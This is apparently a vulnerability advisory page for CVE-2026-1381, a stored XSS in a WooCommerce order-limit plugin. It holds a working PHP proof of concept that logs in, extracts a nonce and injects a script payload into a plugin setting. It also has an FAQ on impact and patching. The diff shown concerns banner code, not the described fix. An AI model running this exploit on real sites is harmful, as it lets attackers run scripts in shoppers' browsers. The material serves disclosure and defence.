--- a/order-minimum-amount-for-woocommerce/vendor/wpfactory/wpfactory-cross-selling/src/php/class-recommendations-box.php
+++ b/order-minimum-amount-for-woocommerce/vendor/wpfactory/wpfactory-cross-selling/src/php/class-recommendations-box.php
@@ -115,7 +115,7 @@
 			$box_tags       = $box_tags_class->get_tags();

 			// Banners.
-			$banners = $this->get_wpfactory_cross_selling()->banners->get_banners();
+			$banners = $this->get_wpfactory_cross_selling()->banners->get_recommendation_tab_banners();

 			?>
 			<div class="wpfcs-recommendations-box">
@@ -148,12 +148,7 @@
 					<?php endforeach; ?>
 				</div>
 				<div class="wpfcs-banners">
-					<?php foreach ( $banners as $banner ): ?>
-						<div class="wpfcs-banner">
-							<?php $banner_img_src = $banner['img_src'] ?>
-							<a href="<?php echo esc_url( $banner['url'] ); ?>" target="<?php echo esc_attr( $banner['target'] ); ?>"><img src="<?php echo esc_attr( $banner_img_src ); ?>"/></a>
-						</div>
-					<?php endforeach; ?>
+					<?php echo $this->get_wpfactory_cross_selling()->banners->render_recommendation_tab_banners( $banners ) ?>
 				</div>
 			</div>
 			<?php
--- a/order-minimum-amount-for-woocommerce/vendor/wpfactory/wpfactory-cross-selling/src/php/class-wpfactory-cross-selling.php
+++ b/order-minimum-amount-for-woocommerce/vendor/wpfactory/wpfactory-cross-selling/src/php/class-wpfactory-cross-selling.php
@@ -2,7 +2,7 @@
 /**
  * WPFactory Cross-Selling
  *
- * @version 1.0.5
+ * @version 1.0.7
  * @since   1.0.0
  * @author  WPFactory
  */
@@ -32,7 +32,7 @@
 		 *
 		 * @var string
 		 */
-		protected $version = '1.0.6';
+		protected $version = '1.0.9';

 		/**
 		 * Setup args.
@@ -82,7 +82,7 @@
 		/**
 		 * Setups the class.
 		 *
-		 * @version 1.0.5
+		 * @version 1.0.7
 		 * @since   1.0.0
 		 *
 		 * @param $args
@@ -96,6 +96,7 @@
 				'plugin_file_path'     => '',
 				'recommendations_page' => array(),
 				'recommendations_box'  => array(),
+				'banners'              => array()
 			) );

 			// Recommendations page.
@@ -120,6 +121,17 @@
 				'wc_settings_tab_id' => '',
 			) );

+			$args['banners'] = wp_parse_args( $args['banners'], array(
+				'enable'                  => true,
+				'get_banner_method'       => 'advanced_ads',
+				'banner_cache_duration'   => HOUR_IN_SECONDS, // `false` to not cache results.
+				'banner_dismiss_duration' => WEEK_IN_SECONDS, // `false` to always display it.
+				'advanced_ads_setup'      => array(
+					'dashboard_banner_group_name' => 'CS - Dashboard',
+					'recommendations_group_name' => 'CS - Recommendations'
+				)
+			) );
+
 			// Library file path.
 			$args['library_file_path'] = __FILE__;
 			$args['library_root_path'] = plugin_dir_path( dirname( __FILE__ ) );
@@ -130,7 +142,7 @@
 		/**
 		 * Initializes the class.
 		 *
-		 * @version 1.0.4
+		 * @version 1.0.7
 		 * @since   1.0.0
 		 *
 		 * @return void
@@ -144,10 +156,6 @@
 			// Products.
 			$this->products = new Products();

-			// Banners.
-			$this->banners = new Banners();
-			$this->banners->set_wpfactory_cross_selling( $this );
-
 			// Product Categories.
 			$this->product_categories = new Product_Categories();

@@ -161,6 +169,11 @@
 			$recommendations_box->set_wpfactory_cross_selling( $this );
 			$recommendations_box->init();

+			// Banners.
+			$this->banners = new Banners();
+			$this->banners->set_wpfactory_cross_selling( $this );
+			$this->banners->init();
+
 			// Enqueues admin syles.
 			add_action( 'admin_enqueue_scripts', array( $this, 'enqueue_admin_styles' ) );
 		}

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-1381 - Order Minimum/Maximum Amount Limits for WooCommerce <= 4.6.8 - Authenticated (Shop Manager+) Stored Cross-Site Scripting via Hide Add to Cart Content Fields

<?php
/**
 * Proof of Concept for CVE-2026-1381
 * Requires valid Shop Manager credentials and WordPress nonce
 * This script demonstrates stored XSS injection via plugin settings
 */

$target_url = 'https://vulnerable-site.com';
$username = 'shop_manager_user';
$password = 'shop_manager_password';

// XSS payload to inject into plugin settings
$xss_payload = '<script>alert("Atomic Edge Research - XSS via CVE-2026-1381");</script>';

// Initialize cURL session for WordPress login
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-login.php');
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => 1
]));
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
$login_response = curl_exec($ch);

// Extract nonce from plugin settings page
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/admin.php?page=wc-settings&tab=alg_wc_oma');
$settings_page = curl_exec($ch);

// Parse nonce from the settings page (simplified - actual implementation would need proper HTML parsing)
preg_match('/name="_wpnonce" value="([a-f0-9]+)"/', $settings_page, $nonce_matches);
$nonce = $nonce_matches[1] ?? '';

if (empty($nonce)) {
    die('Failed to extract WordPress nonce');
}

// Inject XSS payload into the hide add to cart content field
// The plugin stores this in option: alg_wc_oma_max_hide_add_to_cart_single_content
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/admin.php?page=wc-settings&tab=alg_wc_oma');
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
    '_wpnonce' => $nonce,
    '_wp_http_referer' => '/wp-admin/admin.php?page=wc-settings&tab=alg_wc_oma',
    'alg_wc_oma_max_hide_add_to_cart_single_content' => $xss_payload,
    'save' => 'Save changes'
]));

$injection_response = curl_exec($ch);
curl_close($ch);

if (strpos($injection_response, 'Settings saved') !== false) {
    echo "XSS payload successfully injected.n";
    echo "Visit any product page where order minimum/maximum conditions trigger hide add-to-cart logic to execute the payload.n";
} else {
    echo "Failed to inject XSS payload. Check credentials and permissions.n";
}

?>

Frequently Asked Questions

What is CVE-2026-1381?
Overview of the vulnerability
CVE-2026-1381 is a stored cross-site scripting (XSS) vulnerability in the Order Minimum/Maximum Amount Limits for WooCommerce plugin for WordPress. It allows authenticated users with Shop Manager permissions or higher to inject arbitrary JavaScript into WooCommerce product pages, which can execute when other users view those pages.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises from insufficient input sanitization and output escaping in the plugin’s settings. Attackers can inject malicious scripts into specific configuration fields, which are then stored in the WordPress database and executed when users access affected product pages.
Who is affected by this vulnerability?
Identifying at-risk users
Any WordPress installations using the Order Minimum/Maximum Amount Limits for WooCommerce plugin version 4.6.8 or earlier are affected. This primarily impacts multi-site installations or those where the unfiltered_html capability is disabled, as only authenticated users with Shop Manager permissions can exploit the vulnerability.
How can I check if my site is vulnerable?
Steps for assessment
To determine if your site is vulnerable, check the version of the Order Minimum/Maximum Amount Limits for WooCommerce plugin installed. If it is version 4.6.8 or earlier, your site is at risk. Additionally, review the plugin settings for any unauthorized changes or script injections.
What should I do to fix this issue?
Patch and update guidance
The vulnerability has been patched in version 4.6.9 of the plugin. To mitigate the issue, update the plugin to the latest version immediately. Regularly check for updates to ensure ongoing protection against vulnerabilities.
What does the CVSS score of 4.4 indicate?
Understanding severity levels
A CVSS score of 4.4 indicates a medium severity level for this vulnerability. This means that while the risk is not critical, it is significant enough to warrant immediate attention, especially in environments where user data and security are priorities.
What are the practical risks associated with this vulnerability?
Potential consequences of exploitation
Exploitation of this vulnerability can lead to various security risks, including session hijacking, data theft, or redirecting users to malicious sites. Attackers could gain access to sensitive information such as authentication cookies or payment details, posing a significant threat to users.
How does the proof of concept demonstrate the vulnerability?
Illustration of exploitation
The proof of concept provided shows how an authenticated user can log into a vulnerable WordPress site and inject a JavaScript payload into the plugin settings. This script demonstrates the stored XSS attack by executing an alert when the modified content is viewed by other users, highlighting the vulnerability’s impact.
What is the role of wp_kses_post() in the patch?
Technical details of the fix
The wp_kses_post() function is used in the patch to sanitize output by allowing only a limited set of HTML tags and attributes. This effectively prevents JavaScript injection while still permitting safe HTML formatting, thus mitigating the risk of XSS attacks.
How can I further secure my WordPress site?
Best practices for WordPress security
To enhance the security of your WordPress site, regularly update all plugins and themes, use strong passwords, implement two-factor authentication, and limit user permissions. Additionally, consider using security plugins that monitor for vulnerabilities and provide firewall protection.
What should I do if I cannot update the plugin immediately?
Interim mitigation strategies
If immediate updating is not possible, consider disabling the affected plugin until a patch can be applied. Additionally, review user permissions to limit access to the plugin settings, and monitor for any suspicious activity on your site.
Where can I find more information about this vulnerability?
Resources for further reading
Further information about CVE-2026-1381 can be found on the official CVE database, security blogs, and the WordPress plugin repository. Keeping abreast of security advisories and updates from trusted sources is essential for maintaining site security.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations